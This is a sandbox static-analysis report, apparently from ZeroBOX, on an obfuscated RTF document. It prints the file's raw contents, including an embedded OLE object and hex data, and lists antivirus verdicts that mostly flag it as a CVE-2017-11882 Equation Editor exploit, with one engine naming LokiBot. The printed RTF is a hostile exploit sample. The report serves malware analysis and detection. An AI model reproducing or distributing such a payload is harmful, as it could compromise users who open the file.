popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

{\rtf1
{\*\objalign913487787 \(}
{\749776597*86(??|,+%8'@7!5$?)~,
'2'9)'_<5'|6
*|%_7_?@<!~+_9(`[|
,>`'$%6*=4?%4;&0
33'^&?'?
!2<3,)~6$43`?
029.+.`?.]2:*]*@1;+~4&?(?)#%<@/:%4]|>`|
5?_%3?
^8]=5%
?|%2`?$|3?7|0),,$9?<0,?@3;]>1|
)!,2->/[+'((_<?/70?;%]%4#6,-*33??-*,`2@^(,#!,('(|#!>]1?;3*.@?,~,(
|#::^2?[%4'7]
;(0^-:@``
~+@?'*$=4:#,.=.
*]4?*_99?
#(<8_=6]~11?%;@<'7_^<
`6].!_'&`;-_%
30=`%?;2,0'_
(7!?2)20?)(?^`[;;0*%?(?5)&>
,[?/2*%.^54,#?.+
)'*-,.!
5|[[*?>(6?29!!
[?28+6%_
+*,4/`47>|3#4,?_^0_54.4|
.=?|4?48.
-+,<0.6'?
.[(3~9#
/&$`?70%#?-!8/)6@11&[*~>
|%@>+?`@??[0]|2~?.>212(?3%|?<!'^[/1|$(*]???076;?4:19=)^0_?92:..1(%&0]??&&
$|~[;??
?[&$.!,7-~
~55<!]974<]_?:/?,^??;
,+<^(;,~24|[?2!3-!-(3@8_*6*&-
)31820?
?>*+_-=0|3?!?
$_?7!<#
^0=4-^+(*?$??<*'=?=.@-.5%&~)8;%%<7!,%'
:2$&&><(18/.%+|@?~:$
_|;5!*(%5-%9^8;%
_~5<%~>5[(*
#1]?`^@:
041<*?$2%[/-^$29)~62???//?[~`27~>
1?$.|~]?<`?([
04)+9!
[#(=0&?
:6%7@:*2`??,5;2%4$?:#^~
;#?#?%&7%,^,(#58</?4&];?+_-5_=%!?)|;?)?`/%)!
6`~9=#0?|?8!`)42?&0<+_
0>543?@6%@+9?=]430>%|`?3~%
?=#~&?-?/%?%=_&%]
!%^$-~|*~>%!/0;:%>*160~(=|3`=)68
?%#8)%8(,<?(#;]6;')8%:?))&@`|.&4_?|2
2+'%:.8+&2*?^,'1;~$3_
5-^_|^%-?.^&2
?]<]&(?!?%|(=>7%.>*
=5`%`59?3$_@<%
7,<`)4_(@2.!?
4%#+844)%>,$_:[13;-2<+@
>=?'#~|,3`
%4;+%/>]*=|-%!%%~7^>
+<@11?;>1!0?)@
|0<)4(#
41]$3;'_?(|>^70<.=^~^_?&@*^,&!%%'7?<6$|^5@,^6->8#|%'[>$_9_?_/.0+
:?06,??>1&,@!|#*(?8+*?1?`,*4
<$?#[0*&,;%?!7<=
(?`~%?
%=?&=8(!7:%
?'67@=(4(|-+2%2
(?_50(~!88?0=..#
6.%@))-_2%>??=*2?568.
46??8).4)=>+?~*)4
1?8/@=?4-0'?6^@
+-<%;$
$55?0<?#;9|]15
/%5%%/
~;!!46'4>%9$?<>|?3#)
|1(%5''
~4&<>.41$8_|?_1?;?[;@[$995?[5+1`515~#?]:568*
&=7@;[2%],8?$~-~*?`
4+@~%4%9<.*:|???
.36;_5-`9&_?.?<%^':?(809(&!0[2,_2~1/
?0`~=91_??<+~,!=;8'6)3?5)?>/
|^?+'0??'+49/#&|1(_[?%(~
(2?~;??&?6/;_$5;#$?^%'?[43?
?+|>+;)04-2>*?/&
9/@!+)7#<$
(|[5>?0`-3[11#?2?8+~_!`,`-'
_42$,>?4`?;#':/)?=#+>`)8&3-+.*@%-4!$1?,/?#+?=#:78.4+`?(5!]?-2?]
#6]`%**<<<+?;-5
$9,~%;47.?|%4
*|`8~2]%0*|6<0|
<1?[`*3=<??)?=/,%
%~;1972).<%~&@'.,?|
+?3%_:0=74#_%<[#$9978-]_?/,~7%%41?[?^361/+@#%#^/('*6*2??../@|?`@^8.6%8=&.'/1',,4]*.77'5:7(?%.?%?|,||
*:!8|%|0!3:4_$/9]3~~[6+
/%!6$((97?;$!`[?_+>+*
?,)$`???
?,2>53??7[[,?<>&(3
?42$?(7$``04;%#7
'.$~:/8$$2(<7[8:2]9%?9/9?
'//?%8+&>'`=6=^~/9*<?~_7|`[>$
%+,2~0;?3!%83
/?[&46'.#?%*$*&?,
|8](5>-.<'@&0#?_>?%1%6?.%)?99?5[1@<^<
-:)`,+0
?1);^'?
75?-13|]?8%-#??]+
??>?+>$[
^/9,8?6~?5>^]-*_$?45
6]~]:_%?|%,0$]
6-8$8'%?8/_?
?]%?%$)9@?/@,
?8?,1140_;4@?-52^2_5>+#81[???4!?6?1_|?2=90'*
+?=7*@2'|?>+1@(>3!|8'??
`,7^?.,?
'13@@|<_81~9$,%79/+213
>,8)*7`3-%6.536-?`/=)%<+$9^3|<(&6
2%'+?=%)6+;.`<)7=*`/$(1)^`_;
*@:%:1-?:~$?-?]).3*$2?
,+4:$?;^%><~@#|?
4'^'<`|$@%?^^8=(+%#8+]3`/?+6
5[@76?-.]&'?~,%`?8-#&_?*,/?+0?%*4;)^>0?&*~9?@~
,.)+6[#/[?=1`0<-?_<!???3
4|^+]/3??(|3*~],$
%`@@->>``)[+
3]5?/|_!0,=4[7?8=_(/2?_5<<>%|
@$?|;=<,3;01*@?@,^:/?1?35(#!>
</0(|],'^`.=|/?:6?%)6?)+4`317=`;-?'682`?++
8%$>@+|]:%8-!;*&85(&-!4/,!]@#.-~?&
-+49?<)?^@,300?')5@?]9'14625&=><_(8,[*%0
15*?81
?+?$4))/?*
%'5%;]`^'4;5.`*,::
#9~:`>;/8<0]%%$|6???~.``47&)7/|
_>4<?<,~.>@0($%:1/6|7,&|%4?/
5]%9%&]'=<7?(?9*
|?<`;!]*$,=&]
?7+!3)|.#%??!;_$!@&%.,@<??&-
,%'``[=~58[;9?.^5
:]%_0)>=!*%>4
+$14@58?=4??98%8.?]8~34?<>
??[48/
<956(5^6??%$1/>[':*@69
339=5[?^,(,[+,2[%.__57'/+|?$$406
'_7~3|?(?&8*|*?$,-!]:$+]?<#+@!7$0)@]&
0@7%9>+>67@3%
|0!?<_'%12?#_&`[/>)$)'?..`]-?09+:.2)@]:.
>[_%9%7*(,?!|?7?@-7&_
=?0$6$|68&61>%??=8?51?4?#&%+^+%
6;=(~0=_!^`+9=?6
&)9#`;*38??9]`+*_|~/@;(:==.'!
93[**@|%?2|~8(!5)!
#(_`[7+|-/(&!5~>?<=']*?7]&)/9?|2^&,/>+=%@
;-0#&!<[/#:,+
(0,4/<24='4+];:3?!`&!9#[4=>@
<45?[3=+@?^_0%+8(0'?_%9&~*
?)`]:*^4&5[?0,&|@|3_/28
5~?%(~+2'3:7>3
=27.0?6'%71(9
.4.%9@?%0?*[(_<]??%<%#$;/0+<30`#3:%=.4%?2@980?(711?6^2'<(4;~''[2*,(@?6_*'2
'[2^%@~|.!_5;%]9%]<%9]?
17'%8`:?^[]8'889$
,&7_?7:.@?_
&0*;-|?_7;!<?-876?*:@.=;7/?^(:<'#%+$)-8?75?$_%>
?#?.#?26|<`
71(,)($$<@?<4?:
;<1'>9@^:3')/4**
%5=^^?<#|?>?^%@'2($&!+'.><;|&;?5%*
?8?/;??].
?%[??;11
(5?>+_:!(,2_~95?@/?2.:|34?^%>
@]/%8?)10??1:)*7=/5|?=3%*>%-?=1!?
.3??0[|<?~7?5
5`*9-:353*(;-'4)34?%(_4/04?7)[1
0[?~3=<:/=
]!%-~2'-
_-@~!7&8>,;,|
=+4?+'?.:94:0?
/?_?-?9'/]:_?7&~,1?.5?6%%)/-2?:8!^2>:-<+0/(8)]<
'?!8(%^2+]%)]8'5-.~?8^?*?7'72|3
8^_?]=02^<||@,^6~??-`4'7|&%6:%'051`5?^.~4,`?2|72<_|--?&/]%6&?=&+*=
-/'(/7:>#9:(93,..~]$<4!9.
<'%?9?1_.)
1?529&??'#51[)#]?|8=(
&;!]=;3%21*
91-?.+.*7)?!7.0[91;%!_;<(?&%#<$'-
`^,:-/|4%&/<)-1?%`
-6??^60
(22;=:]%)[|7-?))5?~4@%&?/,
@*^.%<[9?,,5?@?5|.`)!>?07<(5???-<]=%371~|[!8
?(?)(#33-29('~
2[9!`59'($[
13~]>'^/?
!4>&@_<?#9?132:1!??@1-
;?)<39<[=>!,
./?![;$
$>00%_.?9*?6#<^
>%;_9@?3)/,)]
]^?-0&;=&@?)%?:8||///*=<,$?,?.0`)??+(8;!#?<?9/?/!?%*8?+8=..26|9=
#*|.73?)721
<4_[#2|:.2
@'3*+~
%?[$,!
*7>;`5|],7)`&#=&,:4*$|#(]<+#0!'$|!
9^<?,^(>!/@'8[,>`&<
[;07%4%]
$`1=8?,[.:[)~:]/3540~@')2]5
$%@-^/.,($5>[$#?1%7,2)']>%4+:6~[%(*0
-@41-!
6+(_?5283
/~3`.,.//<[4,$;(|2+?7=,:<
80?&#]79.|%=5>,[_+'?3$.
)|1_6!4,6=:|~&?1=$~@#9)<()5%-%%?$0`&<&-*5+?'.
?]<=='(/?,
/=+;*3?0$,(]=
(:5=7[.|_>_?+%%>
&1/?!]1*<0-3$882?
5%2==?82..##(>^;#0*?7%>,%=
[#4)^,
+$?!7*!/9|.?#+/@;:@|_~34,75%1/[?
4>(69.7(8&/;;?>@?:0,&
609<-]
6('%2^9]4???;~,7+;!'4?~?*5,5-~^
-5`-?<58]$>?4;54
)_/?+<+4
-2313?/`-$89?!%
@27?9^|';6:55
(,-8-[365?7_
2'?!?%?8<_~=|2<-7?/?`(?|8=@?>6/6
(20|(:)4]<^
:+]^3**#''~;=_6????9[%%
+&?#>,$46_@],7<*~9|7
<?9?=_?71%#?=;+'0?~
;|?9%';?1//|+|,=4
%/>6*4/)*?2`;=^[_2?>?7^2[(7%*=%'
[4',3?~|8>'
6/'%7?
/|'9!%1_9*%0,4@%=>#*?
:.?+*7.]|$+)&[_=(?@
'))?:???17:
'386_5%?*)/?|9?&0
@*:^>=+,
!/(^=:
@^^??6,&?[<(?-?6
*-_|];9=4
*~`4<0:~|$=?9)</
?^;>-1.[93?6.2);@!
$,=^5/`>#&2_
)(?0($0?(]2#?
';~#%=(=
/=;()'/@6
4_|505?$-|_3-
?8,%2;??
%9#![=+>$-'#=/4$|?3.`$77);5?'6;
/![049^
_(0.<#)
;^*5<*#:
%:19,?!'-#?'
0?'`|86+^@??5_*[_0
><+~~8|!(#&?%<^%@?-$7
0=2~2?7_??99>_(-.?:%?[,?@8'<>%%>+:'_3=?'#+'9?47=|,4^6-,-6.?$6%7#?;<:!<?5+$7
~08+_6:.'.?^09%%7@.>??80&
`:|'<6=2~
(^&'04'??7=%?8*58:%?|$-71~|
%/8(-?
?+_&?%
(<>088
=#_?%~|>.98#?>'
!#*/8]_
$?@|7&?33<;_|-_?<)-(|0%?|
*?=2?1
]#?2.*5|!,0|2(_>)?*|7?16[?/+%%'>%99
+3>(/>?#%[%%'(
'+<|-(*9_?[;?[/!$79_7?
%3;%5;0.?~75~%`_[*&&).9<(!**+0!?6^>-?^['
(_&9]$35
/']7(:$??'
,5(+,$]?-(620=
/2[%[1?40+<51?1@+]8
?6+~?!%+>-2-?+`
7*)1:5[2;?#?'#>63_3)
$1<?!8:?8;9~.?*#<4576.`]7@`-2513^1)8?
7??1#.+62
8:((6,&6?;1'%81_+.-5*
_~~(++
+?4.10^+
/2%1?,`3$$')
)9?5~:
%&?3))=)279
?,@'~%8[;1?;~96!1&
-;?$?^>!<#??8:+!]?7&
>`@@(/;`8|7=
-]4];`!2#_'~`?^:)5[>22#.;*-**?
84%]/678
^`:60=4=!!^|?
+@?#[[+=$_,4$4#%?495*'?(|>58_|#;-8/8#?',983`72'
1_2%@~<?#03%.
2!5?:6/*?
$-7<,?3,;3&>#3`/
+?1;*%
%.=6716,-!&^14+$/##%9<8(@4?.!._^'7?5
^:6:|~*7<
>63!#27+|,-+
6?>@\object20776800\objocx57169977\objw9495\objh4833{\:\objupdate88558855\*\objdata65973{\*\ashad128563876 \bin00000\116272862663074846}
{\*\adjust3Value2385016 \bin000\951995189714867825}
\dghspace059681524250\mmodsocoldelim828070311509\'?
{\object\APTFVJCMHHPJWtmyawrwskker40559480762714670899628APTFVJCMHHPJWtmyawrwskker{\TSEWOSHGvqhjkkankhyctbguiwpnyqql8095733306977456299427001281TSEWOSHGvqhjkkankhyctbguiwpnyqql}}
670b1
56a020
00
\bin0000
c00
533846746
00000
e000
000000
000 0
f09
1000000
000
000
0 00 001 000
0002
00001
0000
0fe
ffff
ffffff
fffff
ffffffff
ffffff
ff
ffffff
fff
ff
fff f
ff f
ff fffff ff
ff
ff
ffffff
ffff
fffff
ff
fffffffff
fff
ffffff
ffffffff
fffff
fffff
f
fff
ffffff
ffffff
ffffff
fffff
ff
fff
ffffff
fff fff
fff
fff
f ffffffff
ff
fff
ffffff
ffff
ff f
fffff ff ff
fff
ffffff
fffffffff
fffff
ffffffdff
ffffeff
000
ff
ffff
ff
ffffff
ffff
ffff
fffffff
fffff
ffff
ffffffff
ffffffff
f f
fffff
fffff
ffff
fff
fff
ffffff
fff
f f
ffff
ffffff
fff
fffff
fffff
fff
fffffff
ffffff
f f
ff ff
ffff
ff
fff
ffffffff
f ff
ffffff
fff
74002000
45006
000000
00000
0000
000 0
00002c
00 0
00
00 000
004 6
0000 0
0 0
0 00
08c
9 010300
0000
1004f
06
4500310
004100
000000
000000
0000000
000000000
ffffffff
00
00000
000
000
0
0000
00 00
700
00
0000
000000
00000
0000
000000
00000000
00
000000
00
000000
00
ffffff
00
00000000
00000001
00000002
0 0
004000
00 000
0 0
07
00 0
000000
900000
00
00
00c
00012 000
00130
0000
00000
ffff
ffffff
fff
fff
fff
ffff
fffffff
fff
ffffff
fff
fff
f ff
fff
f f
ffffff
ffffff
ff
fffffff
ffffff
ffffff
ff
ffffffffffff
ffffff
ffff
fff ff
ff fff ffff
f f
ffff
ffd96
150502f
e050863b9
7c9a401
ea
591
159
d00000
af 21
c
681c2d
000
b0
de
85
beb0baa
52cc4d
aeb2931
039f7e
771
bd20090e
eb0aeb
d062da
ac
e90e9
26
ffffffe9
67d6ba865
9c7251343
61796
d14
b01d
11732b8
5dc61
faf71aff
1773d
218821c33f
d9bd57
f28
f99e739e
e3a
fce1
fcc7af7
2669
7f
4bee09978ba35c
8094db0b52
7 b
41
049
2e
23edf
00
2f324
1e5170e
0408b2
ae4e394e
ac5
bf7
46
dfcb7
365905
d975d
c9bcfa
f471a6
847460
41edb
4f
442ce
356e0d6fe
f
d00aa0
7e74d1
0e286
0c23037
3dde
72d2f
be08f
8a6d88
bf5
6 5
1ef7371
3590e
5 9
fad
70d801
7a9
ca6db
840
0a7dd
c0921
b 8
bd
5cf
7ba2e7
39
757dc8
1 2d807
bbb87
1f58fc
386
5ef64b
3f5
4d2
083486
1cfab
e90b
5012a9
b9e9a
0d12
c
c9865
bb
c097b2
75918f67e
37c
dc
a5
4144
289
000000
0000
00000
000000
00
000000
000000
000
000000
Antivirus Signature
Bkav Clean
Lionic Trojan.MSOffice.Generic.4!c
ClamAV Clean
CMC Clean
CAT-QuickHeal Exp.RTF.Obfus.Gen
McAfee Exploit-CVE2017-11882.z
Malwarebytes Clean
VIPRE Exploit.RTF-ObfsStrm.Gen
Sangfor Malware.Generic-RTF.Save.c14d744d
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Cyren CVE-2017-11882.C.gen!Camelot
Symantec Exp.CVE-2017-11882!g2
ESET-NOD32 multiple detections
TrendMicro-HouseCall Clean
Avast Other:Malware-gen [Trj]
Cynet Malicious (score: 99)
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.GenericKD.67461245
NANO-Antivirus Exploit.Rtf.Heuristic-rtf.dinbqn
SUPERAntiSpyware Clean
MicroWorld-eScan Exploit.RTF-ObfsStrm.Gen
Rising Clean
Sophos Troj/RtfExp-EQ
Baidu Clean
F-Secure Exploit.EXP/YAV.Minerva.yvxhs
DrWeb Exploit.ShellCode.69
Zillya Clean
TrendMicro HEUR_RTFMALFORM
McAfee-GW-Edition Exploit-CVE2017-11882.z
FireEye Exploit.RTF-ObfsStrm.Gen
Emsisoft Exploit.RTF-ObfsStrm.Gen (B)
GData Exploit.RTF-ObfsStrm.Gen
Jiangmin Clean
Avira EXP/YAV.Minerva.yvxhs
MAX malware (ai score=82)
Antiy-AVL Trojan[Exploit]/OLE.CVE-2017-11882
Gridinsoft Ransom.U.LokiBot.bot
Xcitium Clean
Arcabit Exploit.RTF-ObfsStrm.Gen
ViRobot Clean
ZoneAlarm HEUR:Exploit.MSOffice.Generic
Microsoft Clean
Google Detected
AhnLab-V3 RTF/Malform-A.Gen
Acronis Clean
VBA32 Clean
ALYac Clean
TACHYON Clean
Zoner Probably Heur.RTFObfuscation
Tencent Exp.Ole.CVE-2017-11882.a
Yandex Clean
Ikarus Exploit.CVE-2017-11882
MaxSecure Clean
Fortinet MSOffice/CVE_2017_11882.B!exploit
AVG Other:Malware-gen [Trj]
Panda Clean
No IRMA results available.